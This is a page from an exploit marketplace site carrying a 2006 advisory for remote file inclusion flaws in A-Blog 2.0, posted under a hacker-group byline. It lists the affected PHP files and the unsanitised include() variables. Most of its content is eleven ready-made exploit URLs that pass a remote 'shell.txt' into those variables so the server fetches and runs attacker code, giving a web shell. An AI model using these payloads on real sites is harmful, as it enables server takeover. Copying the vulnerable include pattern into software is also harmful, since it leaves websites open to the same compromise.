[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

A-Blog 2.0 Multiple Remote File Include Vulnerabilities

Author
v1per-haCker
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-897
Category
web applications
Date add
26-09-2006
Platform
unsorted
=======================================================
A-Blog 2.0 Multiple Remote File Include Vulnerabilities
=======================================================


#==============================================================================================
#A-Blog v2.0 Remote File Include
#===============================================================================================
#
#Critical Level : Dangerous
#
#A-Blog
#Version : v2.0
#
#================================================================================================
#Bug in :
#/navigation/links.php
#/navigation/search.php
#/navigation/donation.php
#/navigation/latestnews.php
#/sources/myaccount.php
#
#================================================================================================
#Vlu Code :
#include("$navigation_start")
#include("$navigation_middle")
#include("$navigation_end")
#include("$open_box")
#include("$middle_box")
#include("$close_box")
#================================================================================================
#
#Exploit :
#
#http://localhost/A-Blog/sources/myaccount.php?open_box=http://shell.txt?
#http://localhost/A-Blog/sources/myaccount.php?middle_box=http://shell.txt?
#http://localhost/A-Blog/sources/myaccount.php?close_box=http://shell.txt?
#http://localhost/A-Blog/navigation/search.php?navigation_end=http://shell.txt?
#http://localhost/A-Blog/navigation/donation.php?navigation_start=http://shell.txt?
#http://localhost/A-Blog/navigation/donation.php?navigation_middle=http://shell.txt?
#http://localhost/A-Blog/navigation/donation.php?navigation_end=http://shell.txt?
#http://localhost/A-Blog/navigation/latestnews.php?navigation_start=http://shell.txt?
#http://localhost/A-Blog/navigation/latestnews.php?navigation_middle=http://shell.txt?
#http://localhost/A-Blog/navigation/links.php?navigation_start=http://shell.txt?
#http://localhost/A-Blog/navigation/links.php?navigation_middle=http://shell.txt?

#================================================================================================
#Discoverd By : v1per-haCker
#XP10_hackEr Team
#Greetz to : abu_shahad ; RooT-shilL ; hetler_jeddah ; BooB11 ; FaTaL ; ThE-WoLf-KsA ; mohandko ; fooooz ; maVen
#and all members in XP10_hackEr Team
==================================================================================================



#  0day.today [2024-12-25]  #